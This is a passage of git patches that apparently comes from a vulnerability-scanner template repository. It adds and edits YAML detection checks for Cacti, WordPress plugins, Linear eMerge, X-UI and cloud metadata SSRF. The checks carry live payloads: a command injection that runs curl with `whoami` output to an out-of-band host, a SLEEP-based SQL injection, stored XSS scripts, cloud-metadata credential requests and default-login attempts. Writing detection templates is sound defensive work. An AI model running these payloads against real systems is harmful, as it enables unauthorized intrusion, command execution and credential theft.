+technologies/wordpress/plugins/tinymce-advanced.yaml +technologies/wordpress/plugins/translatepress-multilingual.yaml +technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +technologies/wordpress/plugins/under-construction-page.yaml +technologies/wordpress/plugins/unyson.yaml +technologies/wordpress/plugins/updraftplus.yaml +technologies/wordpress/plugins/use-any-font.yaml +technologies/wordpress/plugins/user-role-editor.yaml +technologies/wordpress/plugins/velvet-blues-update-urls.yaml +technologies/wordpress/plugins/w3-total-cache.yaml +technologies/wordpress/plugins/webp-converter-for-media.yaml +technologies/wordpress/plugins/widget-importer-exporter.yaml +technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +technologies/wordpress/plugins/woo-variation-swatches.yaml +technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +technologies/wordpress/plugins/woocommerce-payments.yaml +technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +technologies/wordpress/plugins/woocommerce-services.yaml +technologies/wordpress/plugins/woocommerce.yaml +technologies/wordpress/plugins/woosidebars.yaml +technologies/wordpress/plugins/wordfence.yaml +technologies/wordpress/plugins/wordpress-importer.yaml +technologies/wordpress/plugins/wordpress-seo.yaml +technologies/wordpress/plugins/worker.yaml +technologies/wordpress/plugins/wp-fastest-cache.yaml +technologies/wordpress/plugins/wp-file-manager.yaml +technologies/wordpress/plugins/wp-google-maps.yaml +technologies/wordpress/plugins/wp-mail-smtp.yaml +technologies/wordpress/plugins/wp-maintenance-mode.yaml +technologies/wordpress/plugins/wp-migrate-db.yaml +technologies/wordpress/plugins/wp-multibyte-patch.yaml +technologies/wordpress/plugins/wp-optimize.yaml +technologies/wordpress/plugins/wp-pagenavi.yaml +technologies/wordpress/plugins/wp-reset.yaml +technologies/wordpress/plugins/wp-sitemap-page.yaml +technologies/wordpress/plugins/wp-smushit.yaml +technologies/wordpress/plugins/wp-statistics.yaml +technologies/wordpress/plugins/wp-super-cache.yaml +technologies/wordpress/plugins/wp-user-avatar.yaml +technologies/wordpress/plugins/wpcf7-recaptcha.yaml +technologies/wordpress/plugins/wpcf7-redirect.yaml +technologies/wordpress/plugins/wpforms-lite.yaml +technologies/wordpress/plugins/wps-hide-login.yaml +technologies/wordpress/plugins/yith-woocommerce-compare.yaml +technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +vulnerabilities/amazon/amazon-ec2-ssrf.yaml +vulnerabilities/other/digital-ocean-ssrf.yaml +vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml From a9d8abe0ec57d036a22f72426ed639e3e9a95b59 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 23:26:07 +0530 Subject: [PATCH 0612/1133] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 43f0522be6..0162dbc5bb 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -20,6 +20,7 @@ requests: Host: {{Hostname}} - |+ + @tls-sni: {{Hostname}} GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 Host: {{Hostname}} From 8d0acc447ae567bfe903ceda8630bfbb736be3e9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 23:27:17 +0530 Subject: [PATCH 0613/1133] Update digital-ocean-ssrf.yaml --- vulnerabilities/other/digital-ocean-ssrf.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/digital-ocean-ssrf.yaml b/vulnerabilities/other/digital-ocean-ssrf.yaml index 17d33e6e1f..913d6e5873 100644 --- a/vulnerabilities/other/digital-ocean-ssrf.yaml +++ b/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -17,6 +17,7 @@ requests: Host: {{Hostname}} - |+ + @tls-sni: {{Hostname}} GET http://169.254.169.254/metadata/v1.json HTTP/1.1 Host: {{Hostname}} From eb187d2e211c5dcfe6cc500f11c44568d6f4070e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Dec 2022 23:42:40 +0530 Subject: [PATCH 0614/1133] Update CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index a5ad5b3de7..5c71939656 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -23,10 +23,10 @@ info: requests: - raw: - - |+ - GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 - Host: {{Hostname}} - X-Forwarded-For: 127.0.0.1 + - | + GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-For: 127.0.0.1 unsafe: true matchers-condition: and From bfdad412d77e7f39d8f6b7ab7ede50c045655499 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 24 Dec 2022 00:39:46 +0530 Subject: [PATCH 0615/1133] Update CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 22 ++++++++++++---------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index 5c71939656..b31accb18d 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -1,10 +1,9 @@ id: CVE-2022-46169 info: - name: Remote command execution in Cacti <= 1.2.22 - Unauthenticated Command Injection + name: Cacti <= 1.2.22 Unauthenticated Command Injection author: Hardik-Solanki - severity: Critical - shodan query: title:"Login to Cacti" + severity: high description: | The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. reference: @@ -19,12 +18,12 @@ info: cwe-id: CWE-285 metadata: verified: true - tags: cve,cve2022,bypass,brute-force,unauth + tags: cve2022,cve,auth-bypass,cacti requests: - raw: - | - GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 + GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 @@ -34,11 +33,14 @@ requests: - type: word part: body words: - - "[]" - - "rrd_name" - - "value" - - "local_data_id" - condition: and + - '"value":' + - '"local_data_id":' + condition: and + + - type: word + part: interactsh_protocol + words: + - "http" - type: status status: From 504fa13597267ccc9cc61c3ff2851db862348785 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 24 Dec 2022 00:47:40 +0530 Subject: [PATCH 0616/1133] fixed-it --- cves/2022/CVE-2022-46169.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index b31accb18d..d4897c9afb 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-46169 cwe-id: CWE-285 metadata: - verified: true + verified: "true" tags: cve2022,cve,auth-bypass,cacti requests: From 09004438cfb348be4ea69cf7280e4a6a550a7fb0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 24 Dec 2022 00:53:41 +0530 Subject: [PATCH 0617/1133] change-serverity --- cves/2022/CVE-2022-46169.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index d4897c9afb..12f5d450d5 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -3,7 +3,7 @@ id: CVE-2022-46169 info: name: Cacti <= 1.2.22 Unauthenticated Command Injection author: Hardik-Solanki - severity: high + severity: critical description: | The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. reference: @@ -18,6 +18,7 @@ info: cwe-id: CWE-285 metadata: verified: "true" + shodan-query: title:"Login to Cacti" tags: cve2022,cve,auth-bypass,cacti requests: From 17c1095d7134a83b48df5cfcf954485ce585a707 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sat, 24 Dec 2022 13:36:22 +0530 Subject: [PATCH 0618/1133] Create CVE-2022-46381.yaml --- cves/2022/CVE-2022-46381.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2022/CVE-2022-46381.yaml diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml new file mode 100644 index 0000000000..e18e534d55 --- /dev/null +++ b/cves/2022/CVE-2022-46381.yaml @@ -0,0 +1,30 @@ +id: CVE-2022-46381 + +info: + name: Linear eMerge - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Linear eMerge E3-Series devices are vulnerable to XSS via the "type" parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 + metadata: + shodan-query: http.html:"Linear eMerge" + verified: "true" + tags: xss,cve,2022,emerge,linear + +requests: + - raw: + - | + GET /badging/badge_template_v0.php?layout=1&type="/> HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '' From addf6f8fe546671c06bd0a915e65d7a2f7bfb4b0 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sat, 24 Dec 2022 13:55:55 +0530 Subject: [PATCH 0619/1133] Update CVE-2022-46381.yaml --- cves/2022/CVE-2022-46381.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml index e18e534d55..e54814dbaa 100644 --- a/cves/2022/CVE-2022-46381.yaml +++ b/cves/2022/CVE-2022-46381.yaml @@ -1,7 +1,7 @@ id: CVE-2022-46381 info: - name: Linear eMerge - Cross Site Scripting + name: Linear eMerge - Cross Site Scripting author: arafatansari severity: medium description: | From 2b1295634db31ecb6de11b57300836fa4c9bf0c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 25 Dec 2022 01:16:52 +0530 Subject: [PATCH 0620/1133] added metadata, additional header ,change severity --- default-logins/xui-weak-login.yaml | 26 +++++++++++++++++--------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/default-logins/xui-weak-login.yaml b/default-logins/xui-weak-login.yaml index e4d9c81eb1..37d402c068 100644 --- a/default-logins/xui-weak-login.yaml +++ b/default-logins/xui-weak-login.yaml @@ -1,20 +1,25 @@ id: xui-weak-login info: - name: x-ui Default Login + name: X-UI Login Default Login author: dali - severity: critical - description: x-ui default login credentials. + severity: high + description: | + X-UI Default Login Credentials. reference: - https://github.com/vaxilu/x-ui + - https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20. classification: cwe-id: CWE-798 + metadata: + verified: "true" + shodan-query: title:"X-UI Login" tags: x-ui,default-login requests: - method: POST path: - - "{{BaseURL}}:54321/login" + - "{{BaseURL}}/login" headers: content-type: application/x-www-form-urlencoded body: "username={{username}}&password={{password}}" @@ -28,13 +33,16 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - '"success":true' - condition: and + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From e5a67cfebad621623460a4256d2a40a65df8ca4f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 25 Dec 2022 01:19:02 +0530 Subject: [PATCH 0621/1133] Update xui-weak-login.yaml --- default-logins/xui-weak-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/xui-weak-login.yaml b/default-logins/xui-weak-login.yaml index 37d402c068..3c7957dfaa 100644 --- a/default-logins/xui-weak-login.yaml +++ b/default-logins/xui-weak-login.yaml @@ -30,7 +30,7 @@ requests: password: - "admin" attack: pitchfork - + matchers-condition: and matchers: - type: word From fb4c896a3c986295d21b17f976c38ddce4ff0274 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 25 Dec 2022 02:00:04 +0530 Subject: [PATCH 0622/1133] fix-formatting , added additional matcher --- cves/2022/CVE-2022-46381.yaml | 26 ++++++++++++++------------ 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml index e54814dbaa..4c3083454e 100644 --- a/cves/2022/CVE-2022-46381.yaml +++ b/cves/2022/CVE-2022-46381.yaml @@ -1,30 +1,32 @@ id: CVE-2022-46381 info: - name: Linear eMerge - Cross Site Scripting + name: Certain Linear eMerge E3-Series - Cross Site Scripting author: arafatansari severity: medium description: | - Linear eMerge E3-Series devices are vulnerable to XSS via the "type" parameter. + Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 + - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt metadata: - shodan-query: http.html:"Linear eMerge" verified: "true" - tags: xss,cve,2022,emerge,linear + shodan-query: http.html:"Linear eMerge" + tags: cve,cve2022,xss,emerge,linear requests: - - raw: - - | - GET /badging/badge_template_v0.php?layout=1&type="/> HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/>' matchers-condition: and matchers: + - type: word + words: + - '' + - 'Badging Template' + condition: and + - type: status status: - 200 - - - type: word - words: - - '' From 7d98a209156887930337d608afdfd54eeb0cf7b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 25 Dec 2022 02:03:35 +0530 Subject: [PATCH 0623/1133] fix-it --- cves/2022/CVE-2022-46381.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml index 4c3083454e..7f4b1bfb6c 100644 --- a/cves/2022/CVE-2022-46381.yaml +++ b/cves/2022/CVE-2022-46381.yaml @@ -25,7 +25,7 @@ requests: words: - '' - 'Badging Template' - condition: and + condition: and - type: status status: From 67d38b72ca6e5995fafa2003181ffaf9c202c7c0 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Sun, 25 Dec 2022 21:55:02 +0000 Subject: [PATCH 0624/1133] Create CVE-2022-3768.yaml --- cves/2022/CVE-2022-3768.yaml | 50 ++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2022/CVE-2022-3768.yaml diff --git a/cves/2022/CVE-2022-3768.yaml b/cves/2022/CVE-2022-3768.yaml new file mode 100644 index 0000000000..df1f241502 --- /dev/null +++ b/cves/2022/CVE-2022-3768.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-3768 + +info: + name: WPSmartContracts < 1.3.12 - Author+ SQLi + author: Hardik-Solanki + severity: high + description: | + The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author + reference: + - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3768 + - https://cve.report/CVE-2022-3768 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-3768 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,wordpress,wp-plugin,wp,sql,WPSmartContracts + +requests: + - raw: + - | + GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(45)))hlAf)&uid=1 HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - NFTs + + - type: word + part: body + words: + - Batch Mint NFTs + + - type: word + part: body + words: + - nft_page_nft-batch-mint + condition: and + + - type: status + status: + - 200 From 0f7d6b9c96ee0f094d1e2514aa212b0f2f82bf1e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 26 Dec 2022 03:25:53 +0530 Subject: [PATCH 0625/1133] Delete CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 45 ----------------------------------- 1 file changed, 45 deletions(-) delete mode 100644 cves/2022/CVE-2022-46169.yaml diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml deleted file mode 100644 index 94bcb06303..0000000000 --- a/cves/2022/CVE-2022-46169.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-46169 - -info: - name: Remote command execution in Cacti <= 1.2.22 - Unauthenticated Command Injection - author: Hardik-Solanki - severity: Critical - shodan query: title:"Login to Cacti" - description: | - The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. - reference: - - https://security-tracker.debian.org/tracker/CVE-2022-46169 - - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 - - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - - https://www.cybersecurity-help.cz/vdb/SB2022121926 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-46169 - cwe-id: CWE-285 - - metadata: - verified: true - tags: cve,cve2022,bypass,brute-force,unauth - -requests: - - raw: - - | - GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 - Host: {{Hostname}} - X-Forwarded-For: 127.0.0.1 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "[]" - - "rrd_name" - - "value" - - "local_data_id" - condition: or - - - type: status - status: - - 200 From e2a62b888d53f1dbeca5d7048d32097d2018b14b Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 26 Dec 2022 00:32:40 +0000 Subject: [PATCH 0626/1133] Create CVE-2022-4260.yaml --- cves/2022/CVE-2022-4260.yaml | 57 ++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 cves/2022/CVE-2022-4260.yaml diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml new file mode 100644 index 0000000000..698de995f0 --- /dev/null +++ b/cves/2022/CVE-2022-4260.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-4260 + +info: + name: WP-Ban < 1.69.1 - Admin+ Stored XSS + author: Hardik-Solanki + severity: high + description: | + The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + reference: + - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 + - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk + classification: + cve-id: CVE-2022-4260 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,wordpress,wp-plugin,wp-ban + +requests: + - raw: + - | + POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-GB,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: {{Hostname}}/wp-admin/options-general.php?page=wp-ban%2Fban-options.php + Content-Type: application/x-www-form-urlencoded + Origin: {{RootURL}} + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + _wpnonce=d65eec14d6&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E&Submit=Save+Changes + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-GB,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: XSS + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From a0e1e950431d576024895e81677647ec35a7d5e2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 26 Dec 2022 06:03:33 +0530 Subject: [PATCH 0627/1133] Delete CVE-2022-46169.yaml --- cves/2022/CVE-2022-46169.yaml | 45 ----------------------------------- 1 file changed, 45 deletions(-) delete mode 100644 cves/2022/CVE-2022-46169.yaml diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml deleted file mode 100644 index 94bcb06303..0000000000 --- a/cves/2022/CVE-2022-46169.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-46169 - -info: - name: Remote command execution in Cacti <= 1.2.22 - Unauthenticated Command Injection - author: Hardik-Solanki - severity: Critical - shodan query: title:"Login to Cacti" - description: | - The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. - reference: - - https://security-tracker.debian.org/tracker/CVE-2022-46169 - - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 - - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - - https://www.cybersecurity-help.cz/vdb/SB2022121926 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-46169 - cwe-id: CWE-285 - - metadata: - verified: true - tags: cve,cve2022,bypass,brute-force,unauth - -requests: - - raw: - - | - GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=1 HTTP/1.1 - Host: {{Hostname}} - X-Forwarded-For: 127.0.0.1 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "[]" - - "rrd_name" - - "value" - - "local_data_id" - condition: or - - - type: status - status: - - 200 From 4731207ed7cc0ec8b146bb0c792fb5393834a430 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 26 Dec 2022 14:01:52 +0530 Subject: [PATCH 0628/1133] Add files via upload --- iot/raspberry-shake-config.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 iot/raspberry-shake-config.yaml diff --git a/iot/raspberry-shake-config.yaml b/iot/raspberry-shake-config.yaml new file mode 100644 index 0000000000..59605bf8ce --- /dev/null +++ b/iot/raspberry-shake-config.yaml @@ -0,0 +1,27 @@ +id: raspberry-shake-config + +info: + name: Raspberry Shake Config Detection + author: pussycat0x + severity: medium + description: | + The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. + The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. + metadata: + shodan-query: title:"Raspberry Shake Config" + tags: misconfig,unauth,iot,raspberry + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Raspberry Shake Config" + - type: status + status: + - 200 \ No newline at end of file From d179beb3672ca8f0b66798b37da96c00008164c5 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 26 Dec 2022 14:07:10 +0530 Subject: [PATCH 0629/1133] minor-update --- iot/raspberry-shake-config.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/iot/raspberry-shake-config.yaml b/iot/raspberry-shake-config.yaml index 59605bf8ce..efa6c3c4c7 100644 --- a/iot/raspberry-shake-config.yaml +++ b/iot/raspberry-shake-config.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: medium description: | - The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. - The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. + The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. +The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. metadata: shodan-query: title:"Raspberry Shake Config" tags: misconfig,unauth,iot,raspberry @@ -24,4 +24,4 @@ requests: - "Raspberry Shake Config" - type: status status: - - 200 \ No newline at end of file + - 200 From 16576edda896d8ccf965914d7a51bd2e6ff865d4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 26 Dec 2022 14:11:40 +0530 Subject: [PATCH 0630/1133] minor-update --- iot/raspberry-shake-config.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/iot/raspberry-shake-config.yaml b/iot/raspberry-shake-config.yaml index efa6c3c4c7..8544d62e55 100644 --- a/iot/raspberry-shake-config.yaml +++ b/iot/raspberry-shake-config.yaml @@ -5,8 +5,7 @@ info: author: pussycat0x severity: medium description: | - The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. -The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. + The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. metadata: shodan-query: title:"Raspberry Shake Config" tags: misconfig,unauth,iot,raspberry From 5c06a669022c0c3fa4e5c390926fd9a6c82c0022 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 26 Dec 2022 16:54:39 +0530 Subject: [PATCH 0631/1133] Add files via upload --- .../installer/concrete-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/installer/concrete-installer.yaml diff --git a/misconfiguration/installer/concrete-installer.yaml b/misconfiguration/installer/concrete-installer.yaml new file mode 100644 index 0000000000..8550ef635e --- /dev/null +++ b/misconfiguration/installer/concrete-installer.yaml @@ -0,0 +1,33 @@ +id: concrete-installer + +info: + name: Concrete Installer + author: pussycat0x + severity: high + metadata: + verified: true + shodan-query: title:"Install concrete" + tags: misconfig,exposure,install,concrete + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/install' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "install concrete" + - "choose language" + condition: and + case-insensitive: true + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 4ffff390a9e7dabf311b3173812c07281dc8737f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 26 Dec 2022 17:13:33 +0530 Subject: [PATCH 0632/1133] Add files via upload --- .../installer/dolibarr-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/installer/dolibarr-installer.yaml diff --git a/misconfiguration/installer/dolibarr-installer.yaml b/misconfiguration/installer/dolibarr-installer.yaml new file mode 100644 index 0000000000..ac2c2c4d76 --- /dev/null +++ b/misconfiguration/installer/dolibarr-installer.yaml @@ -0,0 +1,33 @@ +id: dolibarr-installer + +info: + name: Dolibarr Installer + author: pussycat0x + severity: high + metadata: + verified: true + shodan-query: title:"Dolibarr install or upgrade" + tags: misconfig,exposure,install + +requests: + - method: GET + path: + - '{{BaseURL}}/install/index.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dolibarr install or upgrade" + - "browser language" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b34eb175472bf24c8c680dcaa834b9a8605de9cc Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Mon, 26 Dec 2022 12:42:39 -0300 Subject: [PATCH 0633/1133] WordPress Plugins Update Workflow (#6424) * WordPress Plugins Update Workflow * Changing commit message --- .../wordpress-plugins-update-requirements.txt | 10 + .github/scripts/wordpress-plugins-update.py | 174 ++++++++++++++++++ 